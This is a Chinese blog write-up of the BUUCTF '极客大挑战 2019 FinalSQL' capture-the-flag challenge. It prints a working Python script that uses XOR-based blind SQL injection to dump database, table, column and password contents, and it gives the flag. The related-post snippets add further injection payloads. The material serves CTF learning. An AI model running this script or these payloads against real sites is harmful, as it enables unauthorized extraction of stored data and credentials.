web buuctf [极客大挑战 2019]FinalSQL

最新推荐文章于 2025-03-20 10:18:04 发布
最新推荐文章于 2025-03-20 10:18:04 发布
阅读量1.3k 收藏 2
点赞数
文章标签: 盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44214568/article/details/124047431
版权
本文探讨了如何利用PHP和Python进行SQL盲注攻击,通过实例展示了如何构造payload并利用BP抓包工具进行测试,最终获取到flag{0273bf0d-1bc6-4bb4-b395-0fc380730ec2}

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点:盲注

1.开题

最上面提示用的语言php,脚本python,数据库mysql,注入形式sql盲注

2.随便点个12345,用bp抓包,进行fuzz

 

 报错盲注,贴脚本

# -*- coding: utf-8 -*-
# @Author: jiaoben
# @Date  :  2020/05/03

import re
import requests
import string

url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn//search.php"
flag = ''


def payload(i, j):
    # 数据库名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    # sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
       res = 1
    else:
       res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
              mid = (low + high) // 2
              res = payload(i, mid)
              if res:
                 low = mid + 1
              else:
                 high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
           break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

大佬的wp,自己改一下url。

 得到,flag{0273bf0d-1bc6-4bb4-b395-0fc380730ec2}

buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 881
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: !这里附上佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1909
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1510
因为之前的几道题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
Buuctf [极客挑战 2019]FinalSQL
最新发布
m_de_g的博客
03-20 1107
【代码】Buuctf [极客挑战 2019]FinalSQL
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 617
除了普通的入流程,报错入,时间入外,这题涉及了布尔入当中的异或入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的入方式得到flag。
buuctf.web 32-64
m0_73889365的博客
02-18 911
buuctf.web 刷题
BUUCTF-web刷题记录-2
qq_45628145的博客
07-27 541
[极客挑战 2019]HardSQL 一个登陆框,简单测试一下很多包括union等字符被过滤了,这里这样构造可以成功登录,但是没有flag,所以是要把flag从数据库读出来了 admin'Or(1)# 1 发现^没有被过滤,可以用来代替and,与extractvalue函数结合来尝试进行报错入 这个函数在这里的致用法是这样的,extractvalue(null,concat(0x7e,user(),0x7e)),中间的user()即为你想执行的查询语句 接下来这题就是爆库,爆表,爆字段,爆内容的基本
CTF-Web-SQL
beihai2013
01-26 3471
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠入,sql的show语句,sql的预编译,sql修改表 参考:https:/
buuctf web finalsql
qq_41696858的博客
12-31 465
没啥好说的,经典爆破,随便点一个数字,点1,会跳转到search.php?id=1 把1改成0,会报错error,经典布尔buuctf,原生爆破想都不要想,二分查找吧 先手动测试 payload?id=1^1 error payload ?id=1^0 NO! Not this! Click others~~~ 测试成功,脚本爆破 import re import requests import string import time url = "http://a3a385c8-781e-4ee7-
[极客挑战 2019]FinalSQL
weixin_42513429的博客
04-14 2485
[极客挑战 2019]FinalSQL 比较麻烦,这个题尤为恶心,flag藏得好深,有点坑 首先查询数据库名 python脚本核心payload: "id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid) ![查询数据库](https://img-blog.csdnimg.cn/202004142054...
CTF-Web-[极客挑战 2019]FinalSQL
归子莫的博客
05-03 1039
CTF-Web-[极客挑战 2019]FinalSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]FinalSQL 打开题目的实例 思路 SQl的题目,首先试...
buuctf-FinalSQL
m0_62094846的博客
05-11 484
说了是sql入 看到页面首先会入用户名和密码,但是一些字符和关键词如:' union都被过滤了 对那些数字入手看看 要第六个,可以对id入手 过滤了union ,空格,再加上id不能随意输入,随意返回,所以应该是 而这里也同样过滤了很多,用布尔,时间都会被过滤 用异或入试试(难度挺高的) 先尝试 ?id=1^0 ?id=1^(ascii(substr((select(group_concat(schema_name))from(information..
buuctf极客挑战2019phpeasy
03-20
### BUUCTF 2019 PHP Easy 题目分析 #### 背景介绍 BUUCTF 是国内知名的 CTF 平台之一,其题目涵盖了多种安全领域。其中 PHP 类型的题目通常涉及反序列化漏洞、输入验证不足等问题。以下是针对 **BUUCTF 2019 PHP Easy** 的可能解题思路。 --- #### 反序列化漏洞基础 在 PHP 中,`serialize()` 和 `unserialize()` 函数分别用于对象的序列化和反序列化操作。如果开发者未对用户可控的数据进行严格校验,则可能导致反序列化漏洞的发生[^1]。 通过构造恶意的对象并将其传递给程序中的 `unserialize()` 方法,攻击者可以触发预期之外的行为,例如执行任意代码或访问敏感数据。 --- #### php://filter 协议的应用 PHP 提供了一些伪协议来处理特定场景下的文件流操作。例如: - `php://input`: 获取原始 POST 数据。 - `php://filter`: 对数据流应用过滤器,常用于绕过某些防护机制或读取文件内容。 当目标环境允许使用这些伪协议时,可以通过它们实现一些有趣的操作,比如以 Base64 编码形式读取远程脚本的内容[^2]。 --- #### 字符串查找函数 mb_strpos() 该函数返回指定子字符串首次出现的位置索引。需要意的是,默认情况下它区分小写;另外还可以自定义字符集编码参数 `$encoding` 来适配多字节字符的需求[^3]。 此知识点虽然看似简单,但在实际利用过程中可能会被用来检测是否存在非法字符或者定位入点等位置信息。 --- #### Payload 构造实例 假设题目存在 JSON 输入解析环节,并且服务器端会对提交过来的数据结构做进一步逻辑判断。那么我们可以尝试如下 payload: ```json { "Information": { "year": "2022abc", "items": [ 0, ["a"], "c" ] } } ``` 上述例子展示了如何精心设计嵌套数组以及特殊字段组合而成的有效载荷[^4]。当然具体形态还需依据实际情况调整优化。 --- #### 综合思考与建议 基于以上理论知识和技术手段,解决此类问题的关键在于深入理解官方给出的功能模块及其潜在缺陷所在之处。同时也要善于运用各种工具辅助完成调试工作。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值